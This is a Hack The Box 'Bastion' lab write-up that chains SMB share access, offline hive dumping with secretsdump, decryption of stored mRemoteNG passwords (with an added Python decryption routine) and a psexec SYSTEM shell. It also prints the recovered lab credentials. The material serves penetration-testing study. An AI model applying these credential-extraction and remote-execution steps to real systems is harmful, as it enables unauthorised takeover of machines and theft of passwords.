Hack The Box: Bastion writeup.
I was able to own it without any hints.
Below are the nmap scan results.
└─$ nmap -Pn -A $RHOST -oG general-portscan.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-18 07:52 EDT
Nmap scan report for 10.129.136.29
Host is up (0.50s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: -40m00s, deviation: 1h09m14s, median: -2s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2025-05-18T11:53:29
|_ start_date: 2025-05-18T11:50:49
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-05-18T13:53:28+02:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.03 seconds
The following SMB shares were found.
└─$ smbclient -L $RHOST
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.136.29 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
The Backups share caught my eye, so I connected to it.
└─$ smbclient //$RHOST/Backups
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Apr 16 06:02:11 2019
.. D 0 Tue Apr 16 06:02:11 2019
note.txt AR 116 Tue Apr 16 06:10:09 2019
SDT65CB.tmp A 0 Fri Feb 22 07:43:08 2019
WindowsImageBackup Dn 0 Fri Feb 22 07:44:02 2019
Recursively download the contents of the Backups share.
└─$ smbclient //$RHOST/Backups -c 'prompt OFF; recurse ON; mget *'
Password for [WORKGROUP\kali]:
getting file \note.txt of size 116 as note.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \SDT65CB.tmp of size 0 as SDT65CB.tmp (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \WindowsImageBackup\L4mpje-PC\MediaId of size 16 as WindowsImageBackup/L4mpje-PC/MediaId (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
parallel_read returned NT_STATUS_IO_TIMEOUT
NT_STATUS_INVALID_NETWORK_RESPONSE opening remote file \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
NT_STATUS_CONNECTION_DISCONNECTED opening remote file \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\BackupSpecs.xml
NT_STATUS_CONNECTION_DISCONNECTED opening remote file \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
NT_STATUS_CONNECTION_DISCONNECTED opening remote file \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
NT_STATUS_CONNECTION_DISCONNECTED opening remote file \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
NT_STATUS_CONNECTION_DISCONNECTED opening remote file \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
NT_STATUS_CONNECTION_DISCONNECTED opening remote file \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
NT_STATUS_CONNECTION_DISCONNECTED opening remote file \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
NT_STATUS_CONNECTION_DISCONNECTED opening remote file \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
NT_STATUS_CONNECTION_DISCONNECTED opening remote file \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
NT_STATUS_CONNECTION_DISCONNECTED opening remote file \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
NT_STATUS_CONNECTION_DISCONNECTED opening remote file \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
NT_STATUS_CONNECTION_DISCONNECTED listing \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\*
NT_STATUS_CONNECTION_DISCONNECTED listing \WindowsImageBackup\L4mpje-PC\Catalog\*
NT_STATUS_CONNECTION_DISCONNECTED listing \WindowsImageBackup\L4mpje-PC\SPPMetadataCache\*
The download timed out partway through.
For the time being, I looked at note.txt, which had been downloaded successfully.
└─$ cat note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
It is a note for the sysadmins: "the VPN to the subsidiary office is slow, so don't transfer the backup file locally."
Connecting to the Backups share again, I found two VHD (Virtual Hard Disk) files under WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351.
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\> dir
. Dn 0 Fri Feb 22 07:45:32 2019
.. Dn 0 Fri Feb 22 07:45:32 2019
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd An 37761024 Fri Feb 22 07:44:03 2019
9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd An 5418299392 Fri Feb 22 07:45:32 2019
BackupSpecs.xml An 1186 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml An 1078 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml An 8930 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml An 6542 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml An 2894 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml An 1488 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml An 1484 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml An 3844 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml An 3988 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml An 7110 Fri Feb 22 07:45:32 2019
cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml An 2374620 Fri Feb 22 07:45:32 2019
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd is about 37.7 MB, while 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd is about 5.4 GB.
That is rather too large to download over a slow VPN.
In such cases, the VHD files can instead be mounted on the local machine. First, mount the Backups share on the local machine.
sudo mkdir /mnt/myshare
sudo mount -t cifs //$RHOST/Backups /mnt/myshare -o rw
└─$ sudo mount -t cifs //$RHOST/Backups /mnt/myshare -o rw
Password for root@//10.129.136.29/Backups:
└─$ ls /mnt/myshare
note.txt SDT65CB.tmp WindowsImageBackup
Next, mount the VHD files.
# mount 1st VHD file
sudo mkdir /mnt/vhd
sudo guestmount --add "/mnt/myshare/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd" --ro /mnt/vhd -m /dev/sda1
└─$ sudo ls /mnt/vhd
'$Recycle.Bin' autoexec.bat config.sys 'Documents and Settings' pagefile.sys PerfLogs ProgramData 'Program Files' Recovery 'System Volume Information' Users Windows
# mount 2nd VHD file
sudo mkdir /mnt/vhd2
sudo guestmount --add "/mnt/myshare/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd" --ro /mnt/vhd2 -m /dev/sda1
└─$ sudo ls -la /mnt/vhd2
total 400
drwxrwxrwx 1 root root 4096 Feb 22 2019 .
drwxr-xr-x 5 root root 4096 May 18 08:23 ..
drwxrwxrwx 1 root root 4096 Feb 22 2019 Boot
-rwxrwxrwx 1 root root 383786 Nov 20 2010 bootmgr
-rwxrwxrwx 1 root root 8192 Feb 22 2019 BOOTSECT.BAK
drwxrwxrwx 1 root root 4096 Feb 22 2019 'System Volume Information'
I mounted 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd at /mnt/vhd and 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd at /mnt/vhd2.
Judging by file size, 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd (about 5.4 GB) is the one worth examining closely.
Examining 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd, I found the following registry hive files in the Windows\System32\config directory.
- SAM
- SYSTEM
- SECURITY
I copied these files to the local machine and dumped them with secretsdump.
# copy SAM, SECURITY, SYSTEM hive
sudo cp /mnt/vhd/Windows/System32/config/SAM .
sudo cp /mnt/vhd/Windows/System32/config/SYSTEM .
sudo cp /mnt/vhd/Windows/System32/config/SECURITY .
# dump
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
└─$ impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword
(Unknown User):bureaulampje
[*] DPAPI_SYSTEM
dpapi_machinekey:0x32764bdcb45f472159af59f1dc287fd1920016a6
dpapi_userkey:0xd2e02883757da99914e3138496705b223e9d03dd
[*] Cleaning up...
This yielded the username L4mpje and the password bureaulampje.
The port scan at the start had shown SSH running on port 22, so I tried connecting to the target over SSH as L4mpje:bureaulampje.
└─$ ssh L4mpje@$RHOST
L4mpje@10.129.136.29's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>
l4mpje@BASTION C:\Users\L4mpje>whoami
bastion\l4mpje
l4mpje@BASTION C:\Users\L4mpje>hostname
Bastion
l4mpje@BASTION C:\Users\L4mpje>
l4mpje@BASTION C:\Users\L4mpje>dir Desktop
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692
Directory of C:\Users\L4mpje\Desktop
22-02-2019 16:27 <DIR> .
22-02-2019 16:27 <DIR> ..
18-05-2025 13:51 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 4.796.928.000 bytes free
l4mpje@BASTION C:\Users\L4mpje>type C:\Users\L4mpje\Desktop\user.txt
a0029b07683b5900e8218f6c5ce<REDACTED>
The SSH connection succeeded and I obtained the user flag, C:\Users\L4mpje\Desktop\user.txt.
Next comes privilege escalation.
While enumerating the target, I noticed that a program called mRemoteNG is installed.
l4mpje@BASTION C:\Users\L4mpje>powershell -ep bypass "Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname"
displayname
-----------
Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.24.28127
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.24.28127
mRemoteNG
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.24.28127
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.24.28127
I found a directory named mRemoteNG under both C:\Users\L4mpje\AppData\Roaming and C:\Users\L4mpje\AppData\Local.
l4mpje@BASTION C:\Users\L4mpje>dir /a C:\Users\L4mpje\AppData\Roaming
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692
Directory of C:\Users\L4mpje\AppData\Roaming
22-02-2019 15:01 <DIR> .
22-02-2019 15:01 <DIR> ..
22-02-2019 14:50 <DIR> Adobe
22-02-2019 14:52 <DIR> Microsoft
22-02-2019 15:03 <DIR> mRemoteNG
0 File(s) 0 bytes
5 Dir(s) 4.821.835.776 bytes free
l4mpje@BASTION C:\Users\L4mpje>dir /a C:\Users\L4mpje\AppData\Local
Volume in drive C has no label.
Volume Serial Number is 1B7D-E692
Directory of C:\Users\L4mpje\AppData\Local
22-02-2019 15:03 <DIR> .
22-02-2019 15:03 <DIR> ..
22-02-2019 14:50 <JUNCTION> Application Data [C:\Users\L4mpje\AppData\Local]
22-02-2019 14:50 <DIR> ConnectedDevicesPlatform
22-02-2019 14:50 <JUNCTION> History [C:\Users\L4mpje\AppData\Local\Microsoft\Windows\History]
22-02-2019 16:26 13.090 IconCache.db
22-02-2019 15:03 <DIR> Microsoft
22-02-2019 14:58 <DIR> Microsoft_Corporation
22-02-2019 15:01 <DIR> mRemoteNG
22-02-2019 14:52 <DIR> Packages
31-01-2022 18:10 <DIR> Temp
22-02-2019 14:50 <JUNCTION> Temporary Internet Files [C:\Users\L4mpje\AppData\Local\Microsoft\Windows\INetCache]
22-02-2019 14:50 <DIR> TileDataLayer
22-02-2019 14:50 <DIR> VirtualStore
1 File(s) 13.090 bytes
13 Dir(s) 4.821.835.776 bytes free
Recursively download the contents of the mRemoteNG directories with SCP.
scp -r L4mpje@$RHOST:/C:/Users/L4mpje/AppData/Roaming/mRemoteNG ~/HTB/Dedicated-Labs/owasp10-windows/Bastion/Roaming
scp -r L4mpje@$RHOST:/c:/Users/L4mpje/AppData/Local/mRemoteNG/mRemoteNG.exe_Url_pjpxdehxpaaorqg2thmuhl11a34i3ave/1.76.11.40527 ~/HTB/Dedicated-Labs/owasp10-windows/Bastion/Local
In confCons.xml, downloaded from C:\Users\L4mpje\AppData\Roaming\mRemoteNG, I found the stored Administrator password aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==.
└─$ cat confCons.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
<Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" 
InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />
<Node Name="L4mpje-PC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="8d3579b2-e68e-48c1-8f0f-9ee1347c9128" Username="L4mpje" Domain="" Password="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB" Hostname="192.168.1.75" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" 
InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />
</mrng:Connections>
The password appears to be AES-encrypted; simply Base64-decoding it did not give the plaintext password.
└─$ echo aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw== | base64 -d
��������Va��Qt.ޙ��Y`5��
�
Googling "mRemoteNG password decrypt" turned up this script. Using it, I was able to decrypt the Administrator password from confCons.xml.
└─$ python3 mremoteng_decrypt.py ~/HTB/Dedicated-Labs/owasp10-windows/Bastion/Roaming/mRemoteNG/confCons.xml
Name: DC
Hostname: 127.0.0.1
Username: Administrator
Password: thXLHM96BeKL0ER2
Name: L4mpje-PC
Hostname: 192.168.1.75
Username: L4mpje
Password: bureaulampje
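For reference, here is an added example (my own code, not the writeup's or the linked script's) of the decryption that script performs, written as an audit of a confCons.xml: it reports which stored passwords a given master password unlocks, with mRemoteNG's default "mR3m" as the baseline. It assumes the mRemoteNG 1.76 AES-GCM format (salt, nonce, ciphertext, tag; PBKDF2-HMAC-SHA1 key derivation using the file's KdfIterations; the salt as associated data) and needs the cryptography package, with pycryptodome as a fallback.

```python
"""Audit an mRemoteNG confCons.xml: which stored passwords does a master password
unlock? A hit with the default "mR3m" means anyone holding the file recovers them,
which is what the writeup's decrypt step relies on. Assumed format (mRemoteNG 1.76,
EncryptionEngine="AES", BlockCipherMode="GCM"): Password = base64(salt[16] ||
nonce[16] || ciphertext || tag[16]); key = PBKDF2-HMAC-SHA1(master, salt,
KdfIterations, 32 bytes); the GCM associated data is the salt."""
import base64
import hashlib
import xml.etree.ElementTree as ET

try:
    from cryptography.exceptions import InvalidTag
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM

    def _aes_gcm_open(key, nonce, ct_and_tag, aad):
        try:
            return AESGCM(key).decrypt(nonce, ct_and_tag, aad)
        except InvalidTag:
            return None
except ImportError:  # fall back to pycryptodome when cryptography is absent
    from Crypto.Cipher import AES

    def _aes_gcm_open(key, nonce, ct_and_tag, aad):
        cipher = AES.new(key, AES.MODE_GCM, nonce=nonce)
        cipher.update(aad)
        try:
            return cipher.decrypt_and_verify(ct_and_tag[:-16], ct_and_tag[-16:])
        except ValueError:
            return None

DEFAULT_MASTER_PASSWORD = "mR3m"  # what mRemoteNG uses when no master password is set


def decrypt_mremoteng(b64_blob, master=DEFAULT_MASTER_PASSWORD, iterations=1000):
    """Plaintext of one Password attribute, or None if the blob is too short or the
    GCM tag check fails (wrong master password or tampered blob)."""
    blob = base64.b64decode(b64_blob)
    if len(blob) < 48:  # salt + nonce + tag is the minimum (empty password)
        return None
    salt, nonce, body = blob[:16], blob[16:32], blob[32:]
    key = hashlib.pbkdf2_hmac("sha1", master.encode(), salt, iterations, dklen=32)
    plain = _aes_gcm_open(key, nonce, body, salt)
    return None if plain is None else plain.decode("utf-8")


def audit_confcons(xml_text, master=DEFAULT_MASTER_PASSWORD):
    """One finding per Connection node; "password" is None when not recoverable."""
    root = ET.fromstring(xml_text)
    iterations = int(root.get("KdfIterations", "1000"))
    findings = []
    for node in root.iter("Node"):  # Node elements carry no namespace prefix
        if node.get("Type") == "Connection" and node.get("Password"):
            findings.append({"name": node.get("Name"), "host": node.get("Hostname"),
                             "user": node.get("Username"), "password": decrypt_mremoteng(
                                 node.get("Password"), master, iterations)})
    return findings


# Constructed sample: the writeup's two confCons.xml nodes, trimmed to the attributes
# this audit reads (the Password values are the ones shown on the page).
SAMPLE_CONFCONS = """<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" EncryptionEngine="AES"
  BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" ConfVersion="2.6">
  <Node Name="DC" Type="Connection" Username="Administrator" Hostname="127.0.0.1"
    Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" />
  <Node Name="L4mpje-PC" Type="Connection" Username="L4mpje" Hostname="192.168.1.75"
    Password="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB" />
</mrng:Connections>"""
```

Call audit_confcons() on the file's contents; any finding whose password is not None means the file was never protected by a user-chosen master password, so those credentials should be treated as disclosed to whoever can read it.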
The Administrator password turned out to be thXLHM96BeKL0ER2.
With Administrator:thXLHM96BeKL0ER2 I was able to connect to the target as a high-privilege user.
└─$ impacket-psexec Administrator:thXLHM96BeKL0ER2@$RHOST cmd.exe
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Requesting shares on 10.129.136.29.....
[*] Found writable share ADMIN$
[*] Uploading file WwweaSiq.exe
[*] Opening SVCManager on 10.129.136.29.....
[*] Creating service jXaD on 10.129.136.29.....
[*] Starting service jXaD.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
Obtained the root flag, c:\users\administrator\desktop\root.txt.
C:\Windows\system32> type c:\users\administrator\desktop\root.txt
010a0994489b0032d64f34d<REDACTED>